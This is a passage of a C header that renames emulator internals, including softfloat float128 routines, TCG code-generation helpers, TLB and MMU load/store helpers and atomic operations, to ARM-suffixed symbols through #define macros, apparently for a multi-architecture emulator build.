float128_to_int64_round_to_zero_arm #define float128_to_uint64 float128_to_uint64_arm #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_arm #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_arm #define float128_to_uint32 float128_to_uint32_arm #define float128_to_float32 float128_to_float32_arm #define float128_to_float64 float128_to_float64_arm #define float128_to_floatx80 float128_to_floatx80_arm #define float128_round_to_int float128_round_to_int_arm #define float128_add float128_add_arm #define float128_sub float128_sub_arm #define float128_mul float128_mul_arm #define float128_div float128_div_arm #define float128_rem float128_rem_arm #define float128_sqrt float128_sqrt_arm #define float128_eq float128_eq_arm #define float128_le float128_le_arm #define float128_lt float128_lt_arm #define float128_unordered float128_unordered_arm #define float128_eq_quiet float128_eq_quiet_arm #define float128_le_quiet float128_le_quiet_arm #define float128_lt_quiet float128_lt_quiet_arm #define float128_unordered_quiet float128_unordered_quiet_arm #define floatx80_compare floatx80_compare_arm #define floatx80_compare_quiet floatx80_compare_quiet_arm #define float128_compare float128_compare_arm #define float128_compare_quiet float128_compare_quiet_arm #define floatx80_scalbn floatx80_scalbn_arm #define float128_scalbn float128_scalbn_arm #define softfloat_init softfloat_init_arm #define tcg_optimize tcg_optimize_arm #define gen_new_label gen_new_label_arm #define tcg_can_emit_vec_op tcg_can_emit_vec_op_arm #define tcg_expand_vec_op tcg_expand_vec_op_arm #define tcg_register_jit tcg_register_jit_arm #define tcg_tb_insert tcg_tb_insert_arm #define tcg_tb_remove tcg_tb_remove_arm #define tcg_tb_lookup tcg_tb_lookup_arm #define tcg_tb_foreach tcg_tb_foreach_arm #define tcg_nb_tbs tcg_nb_tbs_arm #define tcg_region_reset_all tcg_region_reset_all_arm #define tcg_region_init tcg_region_init_arm #define tcg_code_size tcg_code_size_arm #define tcg_code_capacity tcg_code_capacity_arm #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_arm #define tcg_malloc_internal tcg_malloc_internal_arm #define tcg_pool_reset tcg_pool_reset_arm #define tcg_context_init tcg_context_init_arm #define tcg_tb_alloc tcg_tb_alloc_arm #define tcg_prologue_init tcg_prologue_init_arm #define tcg_func_start tcg_func_start_arm #define tcg_set_frame tcg_set_frame_arm #define tcg_global_mem_new_internal tcg_global_mem_new_internal_arm #define tcg_temp_new_internal tcg_temp_new_internal_arm #define tcg_temp_new_vec tcg_temp_new_vec_arm #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_arm #define tcg_temp_free_internal tcg_temp_free_internal_arm #define tcg_const_i32 tcg_const_i32_arm #define tcg_const_i64 tcg_const_i64_arm #define tcg_const_local_i32 tcg_const_local_i32_arm #define tcg_const_local_i64 tcg_const_local_i64_arm #define tcg_op_supported tcg_op_supported_arm #define tcg_gen_callN tcg_gen_callN_arm #define tcg_op_remove tcg_op_remove_arm #define tcg_emit_op tcg_emit_op_arm #define tcg_op_insert_before tcg_op_insert_before_arm #define tcg_op_insert_after tcg_op_insert_after_arm #define tcg_cpu_exec_time tcg_cpu_exec_time_arm #define tcg_gen_code tcg_gen_code_arm #define tcg_gen_op1 tcg_gen_op1_arm #define tcg_gen_op2 tcg_gen_op2_arm #define tcg_gen_op3 tcg_gen_op3_arm #define tcg_gen_op4 tcg_gen_op4_arm #define tcg_gen_op5 tcg_gen_op5_arm #define tcg_gen_op6 tcg_gen_op6_arm #define tcg_gen_mb tcg_gen_mb_arm #define tcg_gen_addi_i32 tcg_gen_addi_i32_arm #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_arm #define tcg_gen_subi_i32 tcg_gen_subi_i32_arm #define tcg_gen_andi_i32 tcg_gen_andi_i32_arm #define tcg_gen_ori_i32 tcg_gen_ori_i32_arm #define tcg_gen_xori_i32 tcg_gen_xori_i32_arm #define tcg_gen_shli_i32 tcg_gen_shli_i32_arm #define tcg_gen_shri_i32 tcg_gen_shri_i32_arm #define tcg_gen_sari_i32 tcg_gen_sari_i32_arm #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_arm #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_arm #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_arm #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_arm #define tcg_gen_muli_i32 tcg_gen_muli_i32_arm #define tcg_gen_div_i32 tcg_gen_div_i32_arm #define tcg_gen_rem_i32 tcg_gen_rem_i32_arm #define tcg_gen_divu_i32 tcg_gen_divu_i32_arm #define tcg_gen_remu_i32 tcg_gen_remu_i32_arm #define tcg_gen_andc_i32 tcg_gen_andc_i32_arm #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_arm #define tcg_gen_nand_i32 tcg_gen_nand_i32_arm #define tcg_gen_nor_i32 tcg_gen_nor_i32_arm #define tcg_gen_orc_i32 tcg_gen_orc_i32_arm #define tcg_gen_clz_i32 tcg_gen_clz_i32_arm #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_arm #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_arm #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_arm #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_arm #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_arm #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_arm #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_arm #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_arm #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_arm #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_arm #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_arm #define tcg_gen_extract_i32 tcg_gen_extract_i32_arm #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_arm #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_arm #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_arm #define tcg_gen_add2_i32 tcg_gen_add2_i32_arm #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_arm #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_arm #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_arm #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_arm #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_arm #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_arm #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_arm #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_arm #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_arm #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_arm #define tcg_gen_smin_i32 tcg_gen_smin_i32_arm #define tcg_gen_umin_i32 tcg_gen_umin_i32_arm #define tcg_gen_smax_i32 tcg_gen_smax_i32_arm #define tcg_gen_umax_i32 tcg_gen_umax_i32_arm #define tcg_gen_abs_i32 tcg_gen_abs_i32_arm #define tcg_gen_addi_i64 tcg_gen_addi_i64_arm #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_arm #define tcg_gen_subi_i64 tcg_gen_subi_i64_arm #define tcg_gen_andi_i64 tcg_gen_andi_i64_arm #define tcg_gen_ori_i64 tcg_gen_ori_i64_arm #define tcg_gen_xori_i64 tcg_gen_xori_i64_arm #define tcg_gen_shli_i64 tcg_gen_shli_i64_arm #define tcg_gen_shri_i64 tcg_gen_shri_i64_arm #define tcg_gen_sari_i64 tcg_gen_sari_i64_arm #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_arm #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_arm #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_arm #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_arm #define tcg_gen_muli_i64 tcg_gen_muli_i64_arm #define tcg_gen_div_i64 tcg_gen_div_i64_arm #define tcg_gen_rem_i64 tcg_gen_rem_i64_arm #define tcg_gen_divu_i64 tcg_gen_divu_i64_arm #define tcg_gen_remu_i64 tcg_gen_remu_i64_arm #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_arm #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_arm #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_arm #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_arm #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_arm #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_arm #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_arm #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_arm #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_arm #define tcg_gen_not_i64 tcg_gen_not_i64_arm #define tcg_gen_andc_i64 tcg_gen_andc_i64_arm #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_arm #define tcg_gen_nand_i64 tcg_gen_nand_i64_arm #define tcg_gen_nor_i64 tcg_gen_nor_i64_arm #define tcg_gen_orc_i64 tcg_gen_orc_i64_arm #define tcg_gen_clz_i64 tcg_gen_clz_i64_arm #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_arm #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_arm #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_arm #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_arm #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_arm #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_arm #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_arm #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_arm #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_arm #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_arm #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_arm #define tcg_gen_extract_i64 tcg_gen_extract_i64_arm #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_arm #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_arm #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_arm #define tcg_gen_add2_i64 tcg_gen_add2_i64_arm #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_arm #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_arm #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_arm #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_arm #define tcg_gen_smin_i64 tcg_gen_smin_i64_arm #define tcg_gen_umin_i64 tcg_gen_umin_i64_arm #define tcg_gen_smax_i64 tcg_gen_smax_i64_arm #define tcg_gen_umax_i64 tcg_gen_umax_i64_arm #define tcg_gen_abs_i64 tcg_gen_abs_i64_arm #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_arm #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_arm #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_arm #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_arm #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_arm #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_arm #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_arm #define tcg_gen_exit_tb tcg_gen_exit_tb_arm #define tcg_gen_goto_tb tcg_gen_goto_tb_arm #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_arm #define check_exit_request check_exit_request_arm #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_arm #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_arm #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_arm #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_arm #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_arm #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_arm #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_arm #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_arm #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_arm #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_arm #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_arm #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_arm #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_arm #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_arm #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_arm #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_arm #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_arm #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_arm #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_arm #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_arm #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_arm #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_arm #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_arm #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_arm #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_arm #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_arm #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_arm #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_arm #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_arm #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_arm #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_arm #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_arm #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_arm #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_arm #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_arm #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_arm #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_arm #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_arm #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_arm #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_arm #define simd_desc simd_desc_arm #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_arm #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_arm #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_arm #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_arm #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_arm #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_arm #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_arm #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_arm #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_arm #define tcg_gen_gvec_2 tcg_gen_gvec_2_arm #define tcg_gen_gvec_2i tcg_gen_gvec_2i_arm #define tcg_gen_gvec_2s tcg_gen_gvec_2s_arm #define tcg_gen_gvec_3 tcg_gen_gvec_3_arm #define tcg_gen_gvec_3i tcg_gen_gvec_3i_arm #define tcg_gen_gvec_4 tcg_gen_gvec_4_arm #define tcg_gen_gvec_mov tcg_gen_gvec_mov_arm #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_arm #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_arm #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_arm #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_arm #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_arm #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_arm #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_arm #define tcg_gen_gvec_not tcg_gen_gvec_not_arm #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_arm #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_arm #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_arm #define tcg_gen_gvec_add tcg_gen_gvec_add_arm #define tcg_gen_gvec_adds tcg_gen_gvec_adds_arm #define tcg_gen_gvec_addi tcg_gen_gvec_addi_arm #define tcg_gen_gvec_subs tcg_gen_gvec_subs_arm #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_arm #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_arm #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_arm #define tcg_gen_gvec_sub tcg_gen_gvec_sub_arm #define tcg_gen_gvec_mul tcg_gen_gvec_mul_arm #define tcg_gen_gvec_muls tcg_gen_gvec_muls_arm #define tcg_gen_gvec_muli tcg_gen_gvec_muli_arm #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_arm #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_arm #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_arm #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_arm #define tcg_gen_gvec_smin tcg_gen_gvec_smin_arm #define tcg_gen_gvec_umin tcg_gen_gvec_umin_arm #define tcg_gen_gvec_smax tcg_gen_gvec_smax_arm #define tcg_gen_gvec_umax tcg_gen_gvec_umax_arm #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_arm #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_arm #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_arm #define tcg_gen_gvec_neg tcg_gen_gvec_neg_arm #define tcg_gen_gvec_abs tcg_gen_gvec_abs_arm #define tcg_gen_gvec_and tcg_gen_gvec_and_arm #define tcg_gen_gvec_or tcg_gen_gvec_or_arm #define tcg_gen_gvec_xor tcg_gen_gvec_xor_arm #define tcg_gen_gvec_andc tcg_gen_gvec_andc_arm #define tcg_gen_gvec_orc tcg_gen_gvec_orc_arm #define tcg_gen_gvec_nand tcg_gen_gvec_nand_arm #define tcg_gen_gvec_nor tcg_gen_gvec_nor_arm #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_arm #define tcg_gen_gvec_ands tcg_gen_gvec_ands_arm #define tcg_gen_gvec_andi tcg_gen_gvec_andi_arm #define tcg_gen_gvec_xors tcg_gen_gvec_xors_arm #define tcg_gen_gvec_xori tcg_gen_gvec_xori_arm #define tcg_gen_gvec_ors tcg_gen_gvec_ors_arm #define tcg_gen_gvec_ori tcg_gen_gvec_ori_arm #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_arm #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_arm #define tcg_gen_gvec_shli tcg_gen_gvec_shli_arm #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_arm #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_arm #define tcg_gen_gvec_shri tcg_gen_gvec_shri_arm #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_arm #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_arm #define tcg_gen_gvec_sari tcg_gen_gvec_sari_arm #define tcg_gen_gvec_shls tcg_gen_gvec_shls_arm #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_arm #define tcg_gen_gvec_sars tcg_gen_gvec_sars_arm #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_arm #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_arm #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_arm #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_arm #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_arm #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_arm #define vec_gen_2 vec_gen_2_arm #define vec_gen_3 vec_gen_3_arm #define vec_gen_4 vec_gen_4_arm #define tcg_gen_mov_vec tcg_gen_mov_vec_arm #define tcg_const_zeros_vec tcg_const_zeros_vec_arm #define tcg_const_ones_vec tcg_const_ones_vec_arm #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_arm #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_arm #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_arm #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_arm #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_arm #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_arm #define tcg_gen_dupi_vec tcg_gen_dupi_vec_arm #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_arm #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_arm #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_arm #define tcg_gen_ld_vec tcg_gen_ld_vec_arm #define tcg_gen_st_vec tcg_gen_st_vec_arm #define tcg_gen_stl_vec tcg_gen_stl_vec_arm #define tcg_gen_and_vec tcg_gen_and_vec_arm #define tcg_gen_or_vec tcg_gen_or_vec_arm #define tcg_gen_xor_vec tcg_gen_xor_vec_arm #define tcg_gen_andc_vec tcg_gen_andc_vec_arm #define tcg_gen_orc_vec tcg_gen_orc_vec_arm #define tcg_gen_nand_vec tcg_gen_nand_vec_arm #define tcg_gen_nor_vec tcg_gen_nor_vec_arm #define tcg_gen_eqv_vec tcg_gen_eqv_vec_arm #define tcg_gen_not_vec tcg_gen_not_vec_arm #define tcg_gen_neg_vec tcg_gen_neg_vec_arm #define tcg_gen_abs_vec tcg_gen_abs_vec_arm #define tcg_gen_shli_vec tcg_gen_shli_vec_arm #define tcg_gen_shri_vec tcg_gen_shri_vec_arm #define tcg_gen_sari_vec tcg_gen_sari_vec_arm #define tcg_gen_cmp_vec tcg_gen_cmp_vec_arm #define tcg_gen_add_vec tcg_gen_add_vec_arm #define tcg_gen_sub_vec tcg_gen_sub_vec_arm #define tcg_gen_mul_vec tcg_gen_mul_vec_arm #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_arm #define tcg_gen_usadd_vec tcg_gen_usadd_vec_arm #define tcg_gen_sssub_vec tcg_gen_sssub_vec_arm #define tcg_gen_ussub_vec tcg_gen_ussub_vec_arm #define tcg_gen_smin_vec tcg_gen_smin_vec_arm #define tcg_gen_umin_vec tcg_gen_umin_vec_arm #define tcg_gen_smax_vec tcg_gen_smax_vec_arm #define tcg_gen_umax_vec tcg_gen_umax_vec_arm #define tcg_gen_shlv_vec tcg_gen_shlv_vec_arm #define tcg_gen_shrv_vec tcg_gen_shrv_vec_arm #define tcg_gen_sarv_vec tcg_gen_sarv_vec_arm #define tcg_gen_shls_vec tcg_gen_shls_vec_arm #define tcg_gen_shrs_vec tcg_gen_shrs_vec_arm #define tcg_gen_sars_vec tcg_gen_sars_vec_arm #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_arm #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_arm #define tb_htable_lookup tb_htable_lookup_arm #define tb_set_jmp_target tb_set_jmp_target_arm #define cpu_exec cpu_exec_arm #define cpu_loop_exit_noexc cpu_loop_exit_noexc_arm #define cpu_reloading_memory_map cpu_reloading_memory_map_arm #define cpu_loop_exit cpu_loop_exit_arm #define cpu_loop_exit_restore cpu_loop_exit_restore_arm #define cpu_loop_exit_atomic cpu_loop_exit_atomic_arm #define tlb_init tlb_init_arm #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_arm #define tlb_flush tlb_flush_arm #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_arm #define tlb_flush_all_cpus tlb_flush_all_cpus_arm #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_arm #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_arm #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_arm #define tlb_flush_page tlb_flush_page_arm #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_arm #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_arm #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_arm #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_arm #define tlb_protect_code tlb_protect_code_arm #define tlb_unprotect_code tlb_unprotect_code_arm #define tlb_reset_dirty tlb_reset_dirty_arm #define tlb_set_dirty tlb_set_dirty_arm #define tlb_set_page_with_attrs tlb_set_page_with_attrs_arm #define tlb_set_page tlb_set_page_arm #define get_page_addr_code_hostp get_page_addr_code_hostp_arm #define get_page_addr_code get_page_addr_code_arm #define probe_access probe_access_arm #define tlb_vaddr_to_host tlb_vaddr_to_host_arm #define helper_ret_ldub_mmu helper_ret_ldub_mmu_arm #define helper_le_lduw_mmu helper_le_lduw_mmu_arm #define helper_be_lduw_mmu helper_be_lduw_mmu_arm #define helper_le_ldul_mmu helper_le_ldul_mmu_arm #define helper_be_ldul_mmu helper_be_ldul_mmu_arm #define helper_le_ldq_mmu helper_le_ldq_mmu_arm #define helper_be_ldq_mmu helper_be_ldq_mmu_arm #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_arm #define helper_le_ldsw_mmu helper_le_ldsw_mmu_arm #define helper_be_ldsw_mmu helper_be_ldsw_mmu_arm #define helper_le_ldsl_mmu helper_le_ldsl_mmu_arm #define helper_be_ldsl_mmu helper_be_ldsl_mmu_arm #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_arm #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_arm #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_arm #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_arm #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_arm #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_arm #define cpu_ldub_data_ra cpu_ldub_data_ra_arm #define cpu_ldsb_data_ra cpu_ldsb_data_ra_arm #define cpu_lduw_data_ra cpu_lduw_data_ra_arm #define cpu_ldsw_data_ra cpu_ldsw_data_ra_arm #define cpu_ldl_data_ra cpu_ldl_data_ra_arm #define cpu_ldq_data_ra cpu_ldq_data_ra_arm #define cpu_ldub_data cpu_ldub_data_arm #define cpu_ldsb_data cpu_ldsb_data_arm #define cpu_lduw_data cpu_lduw_data_arm #define cpu_ldsw_data cpu_ldsw_data_arm #define cpu_ldl_data cpu_ldl_data_arm #define cpu_ldq_data cpu_ldq_data_arm #define helper_ret_stb_mmu helper_ret_stb_mmu_arm #define helper_le_stw_mmu helper_le_stw_mmu_arm #define helper_be_stw_mmu helper_be_stw_mmu_arm #define helper_le_stl_mmu helper_le_stl_mmu_arm #define helper_be_stl_mmu helper_be_stl_mmu_arm #define helper_le_stq_mmu helper_le_stq_mmu_arm #define helper_be_stq_mmu helper_be_stq_mmu_arm #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_arm #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_arm #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_arm #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_arm #define cpu_stb_data_ra cpu_stb_data_ra_arm #define cpu_stw_data_ra cpu_stw_data_ra_arm #define cpu_stl_data_ra cpu_stl_data_ra_arm #define cpu_stq_data_ra cpu_stq_data_ra_arm #define cpu_stb_data cpu_stb_data_arm #define cpu_stw_data cpu_stw_data_arm #define cpu_stl_data cpu_stl_data_arm #define cpu_stq_data cpu_stq_data_arm #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_arm #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_arm #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_arm #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_arm #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_arm #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_arm #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_arm #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_arm #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_arm #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_arm #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_arm #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_arm #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_arm #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_arm #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_arm #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_arm #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_arm #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_arm #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_arm #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_arm #define helper_atomic_fetch_addw_le_mmu 